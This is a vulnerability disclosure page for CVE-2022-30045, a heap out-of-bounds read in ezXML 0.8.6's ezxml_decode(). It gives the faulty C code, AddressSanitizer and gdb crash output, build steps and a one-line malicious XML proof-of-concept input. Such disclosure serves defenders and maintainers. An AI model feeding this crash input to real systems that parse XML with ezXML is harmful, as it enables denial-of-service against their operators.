Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30045: ezXML / Bugs / #29 Out-of-bounds read in ezxml_decode() leading to heap corruption

An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_decode() performs incorrect memory handling while parsing crafted XML files, leading to a heap out-of-bounds read.

CVE
Open in Source
#c++

Version 0.8.6 and CVEs that have been patched

Out-of-bounds read in strchr of ezxml_decode() [ezxml.c:198:25]

if(ent[b++]){// found a match if((c=strlen(ent[b]))-1>(e=strchr(s,’;’))-s){ l=(d=(s-r))+c+strlen(e);// new length r=(r==m)?strcpy(malloc(l),r):realloc(r,l); e=strchr((s=r+d),’;’);// out-of-bounds read }

May cause DOS attack

Crash Info

./ezxmltest…/poc/ezxml-poc.xml================================================================= ==2357578==ERROR:AddressSanitizer:heap-buffer-overflowonaddress0x603000000021atpc0x000000430ff4bp0x7ffc963072b0sp0x7ffc96306a70 READofsize7at0x603000000021threadT0 #00x430ff3instrchr(/home/migraine/下载/ezxml/ezxmltest+0x430ff3) #10x4cc6e7inezxml_decode/home/migraine/下载/ezxml/ezxml.c:198:25 #20x4cdb26inezxml_char_content/home/migraine/下载/ezxml/ezxml.c:242:22 #30x4d607binezxml_parse_str/home/migraine/下载/ezxml/ezxml.c:592:21 #40x4d7d5dinezxml_parse_fd/home/migraine/下载/ezxml/ezxml.c:642:30 #50x4e0192inezxml_parse_file/home/migraine/下载/ezxml/ezxml.c:660:19 #60x4e0192inmain/home/migraine/下载/ezxml/ezxml.c:1009:11 #70x7fde60920564in__libc_start_maincsu/…/csu/libc-start.c:332:16 #80x41c33din_start(/home/migraine/下载/ezxml/ezxmltest+0x41c33d)

0x603000000021islocated0bytestotherightof17-byteregion[0x603000000010,0x603000000021) allocatedbythreadT0here: #00x49759dinmalloc(/home/migraine/下载/ezxml/ezxmltest+0x49759d) #10x4cc683inezxml_decode/home/migraine/下载/ezxml/ezxml.c:197:43 #20x4cdb26inezxml_char_content/home/migraine/下载/ezxml/ezxml.c:242:22 #30x4d7d5dinezxml_parse_fd/home/migraine/下载/ezxml/ezxml.c:642:30 #40x4e0192inezxml_parse_file/home/migraine/下载/ezxml/ezxml.c:660:19 #50x4e0192inmain/home/migraine/下载/ezxml/ezxml.c:1009:11

SUMMARY:AddressSanitizer:heap-buffer-overflow(/home/migraine/下载/ezxml/ezxmltest+0x430ff3)instrchr Shadowbytesaroundthebuggyaddress: 0x0c067fff7fb0:00000000000000000000000000000000 0x0c067fff7fc0:00000000000000000000000000000000 0x0c067fff7fd0:00000000000000000000000000000000 0x0c067fff7fe0:00000000000000000000000000000000 0x0c067fff7ff0:00000000000000000000000000000000 =>0x0c067fff8000:fafa0000[01]fafafafafafafafafafafa 0x0c067fff8010:fafafafafafafafafafafafafafafafa 0x0c067fff8020:fafafafafafafafafafafafafafafafa 0x0c067fff8030:fafafafafafafafafafafafafafafafa 0x0c067fff8040:fafafafafafafafafafafafafafafafa 0x0c067fff8050:fafafafafafafafafafafafafafafafa Shadowbytelegend(oneshadowbyterepresents8applicationbytes): Addressable:00 Partiallyaddressable:01020304050607 Heapleftredzone:fa Freedheapregion:fd Stackleftredzone:f1 Stackmidredzone:f2 Stackrightredzone:f3 Stackafterreturn:f5 Stackuseafterscope:f8 Globalredzone:f9 Globalinitorder:f6 Poisonedbyuser:f7 Containeroverflow:fc Arraycookie:ac Intraobjectredzone:bb ASaninternal:fe Leftallocaredzone:ca Rightallocaredzone:cb Shadowgap:cc ==2357578==ABORTING

Turning off ASAN can still trigger a segment fault

$ gdb -q ./ezxmltest (gdb) r …/ezxml-poc.xml Starting program: /home/migraine/下载/poc/ezxml/ezxmltest …/ezxml-poc.xml Program received signal SIGSEGV, Segmentation fault.

How to Crash

Download ezxml from https://sourceforge.net/p/ezxml

cd ezxml AFL_USE_ASAN=1 make test CC=afl-clang CXX=afl-clang++ #compile with ASAN or make test #compile normal ./ezxmltest ezxml-poc.xml

POC

ezxml-poc.xml

<e>&#xeeeeeeEeeeee1;<</e>>>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE